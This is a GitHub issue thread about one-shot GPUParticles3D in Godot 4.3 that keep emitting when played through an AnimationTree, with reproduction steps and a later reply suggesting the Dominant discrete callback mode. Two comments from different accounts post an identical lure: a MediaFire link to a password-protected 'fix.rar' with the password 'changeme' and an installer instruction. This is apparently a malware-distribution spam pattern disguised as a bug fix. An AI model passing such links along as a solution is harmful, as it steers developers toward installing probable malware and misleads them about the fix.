### ISSUE TITLE
OneShot GPUParticles keep emitting in AnimationTree

### ISSUE THREAD

**Issue by JonasRosiers** [godotengine/godot#96171]
### Tested versions

Encountered after upgrading to Godot 4.3

### System information

Godot v4.3.stable - Windows 10.0.22631 - Vulkan (Forward+) - dedicated NVIDIA GeForce RTX 2060 with Max-Q Design (NVIDIA; 31.0.15.5161) - AMD Ryzen 9 4900HS with Radeon Graphics (16 Threads)

### Issue description

When using an AnimationTree to play an animation which sets "emitting" to true on a one_shot GPUParticles3D, the particles keep emitting.

### Steps to reproduce

Create a new scene.
Add GPUParticles3D node. 
Set one_shot to TRUE,
Add a new ProcessMaterial, and draw_pass, 

![screenshot1](https://github.com/user-attachments/assets/9825c83c-3b93-48e4-84ad-19210269270f)

Add an AnimationPlayer, 
Create a new animation with duration of ex. 3seconds. (make it bigger than the particle duration)
At 1 second, insert a property track and set the emitting property to true.

![screenshot2](https://github.com/user-attachments/assets/4cc23e86-ce6f-440d-9461-ad048e833718)

Add an AnimationTree with a new BlendTree as root
Add an animation node with the created animation. connect to the output node and done.

https://github.com/user-attachments/assets/4626451d-c3bb-4c74-9611-be4d58863305

### Minimal reproduction project (MRP)

[godot-4.3-test.zip](https://github.com/user-attachments/files/16763989/godot-4.3-test.zip)

**Comment by AzEred0** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Taiga-A** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by matheusmdx** [comment]
This looks like the same from #89730, so setting CallbackModeDiscrete to `Dominant` should do the trick

![image](https://github.com/user-attachments/assets/29e69bc0-7a89-4abd-a0dd-7e074667dbe3)
